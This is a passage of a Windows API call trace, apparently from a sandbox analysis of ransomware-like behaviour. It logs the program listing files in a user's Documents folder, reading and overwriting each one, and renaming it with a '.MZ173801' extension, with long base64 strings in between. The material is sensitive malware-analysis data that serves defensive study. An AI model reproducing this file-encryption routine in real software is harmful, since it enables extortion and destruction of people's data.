lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.816] GetCurrentThreadId () returned 0x1358 [0121.816] GetCurrentThreadId () returned 0x1358 [0121.816] GetCurrentThreadId () returned 0x1358 [0121.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.816] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.817] GetCurrentThreadId () returned 0x1358 [0121.817] GetCurrentThreadId () returned 0x1358 [0121.817] GetCurrentThreadId () returned 0x1358 [0121.817] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\s89GGesFpGwDjBj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s89ggesfpgwdjbj.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.817] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.817] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.817] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x423b [0121.817] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.817] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x423b, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x423b, lpOverlapped=0x0) returned 1 [0121.818] CloseHandle (hObject=0x3fc) returned 1 [0121.818] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\s89GGesFpGwDjBj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s89ggesfpgwdjbj.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.819] WriteFile (in: hFile=0x3fc, lpBuffer=0x2437b60*, nNumberOfBytesToWrite=0x423b, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2437b60*, lpNumberOfBytesWritten=0x19f9bc*=0x423b, lpOverlapped=0x0) returned 1 [0121.820] CloseHandle (hObject=0x3fc) returned 1 [0121.824] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\s89GGesFpGwDjBj.docx" (normalized: "c:\\users\\fd1hvy\\documents\\s89ggesfpgwdjbj.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\s89GGesFpGwDjBj.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\s89ggesfpgwdjbj.docx.mz173801")) returned 1 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] GetCurrentThreadId () returned 0x1358 [0121.824] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff8f8b70, ftCreationTime.dwHighDateTime=0x1d58964, ftLastAccessTime.dwLowDateTime=0x7d1a4530, ftLastAccessTime.dwHighDateTime=0x1d59cf2, ftLastWriteTime.dwLowDateTime=0x7d1a4530, ftLastWriteTime.dwHighDateTime=0x1d59cf2, nFileSizeHigh=0x0, nFileSizeLow=0xa906, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ScaMQESaGJDS.docx", cAlternateFileName="SCAMQE~1.DOC")) returned 1 [0121.824] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.824] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.824] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\ScaMQESaGJDS.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scamqesagjds.docx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xff8f8b70, ftCreationTime.dwHighDateTime=0x1d58964, ftLastAccessTime.dwLowDateTime=0x7d1a4530, ftLastAccessTime.dwHighDateTime=0x1d59cf2, ftLastWriteTime.dwLowDateTime=0x7d1a4530, ftLastWriteTime.dwHighDateTime=0x1d59cf2, nFileSizeHigh=0x0, nFileSizeLow=0xa906)) returned 1 [0121.825] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.825] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0121.825] GetCurrentThreadId () returned 0x1358 [0121.825] GetCurrentThreadId () returned 0x1358 [0121.825] GetCurrentThreadId () returned 0x1358 [0121.826] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0121.826] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0121.826] GetCurrentThreadId () returned 0x1358 [0121.826] GetCurrentThreadId () returned 0x1358 [0121.826] GetCurrentThreadId () returned 0x1358 [0121.826] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ScaMQESaGJDS.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scamqesagjds.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.826] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0121.826] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.826] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0xa906 [0121.826] SetFilePointer (in: hFile=0x3fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0121.827] ReadFile (in: hFile=0x3fc, lpBuffer=0x2431b30, nNumberOfBytesToRead=0xa906, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0xa906, lpOverlapped=0x0) returned 1 [0121.828] CloseHandle (hObject=0x3fc) returned 1 [0121.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ScaMQESaGJDS.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scamqesagjds.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3fc [0121.830] WriteFile (in: hFile=0x3fc, lpBuffer=0x243db60*, nNumberOfBytesToWrite=0xa906, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x243db60*, lpNumberOfBytesWritten=0x19f9bc*=0xa906, lpOverlapped=0x0) returned 1 [0121.831] CloseHandle (hObject=0x3fc) returned 1 [0121.833] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\ScaMQESaGJDS.docx" (normalized: "c:\\users\\fd1hvy\\documents\\scamqesagjds.docx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\ScaMQESaGJDS.docx.MZ173801" (normalized: "c:\\users\\fd1hvy\\documents\\scamqesagjds.docx.mz173801")) returned 1 [0121.833] GetCurrentThreadId () returned 0x1358 [0121.833] GetCurrentThreadId () returned 0x1358 [0121.834] GetCurrentThreadId () returned 0x1358 [0121.834] GetCurrentThreadId () returned 0x1358 [0121.834] GetCurrentThreadId () returned 0x1358 [0121.834] GetCurrentThreadId () returned 0x1358 [0121.834] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed1b2e0, ftCreationTime.dwHighDateTime=0x1d59bb1, ftLastAccessTime.dwLowDateTime=0x1a06f0a0, ftLastAccessTime.dwHighDateTime=0x1d57ccd, ftLastWriteTime.dwLowDateTime=0x1a06f0a0, ftLastWriteTime.dwHighDateTime=0x1d57ccd, nFileSizeHigh=0x0, nFileSizeLow=0x10ecd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vTIt-8amnULMnTybMLk.pptx", cAlternateFileName="VTIT-8~1.PPT")) returned 1 [0121.834] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0121.834] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0121.834] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\vTIt-8amnULMnTybMLk.pptx" (normalized: "c:\\users\\fd1hvy\\documents\\vtit-8amnulmntybmlk.pptx"), fInfoLevelId=0x0, lpFileInformation=0x19f9f0 | out: lpFileInformation=0x19f9f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4ed1b2e0, ftCreationTime.dwHighDateTime=0x1d59bb1, ftLastAccessTime.dwLowDateTime=0x1a06f0a0, ftLastAccessTime.dwHighDateTime=0x1d57ccd, ftLastWriteTime.dwLowDateTime=0x1a06f0a0, 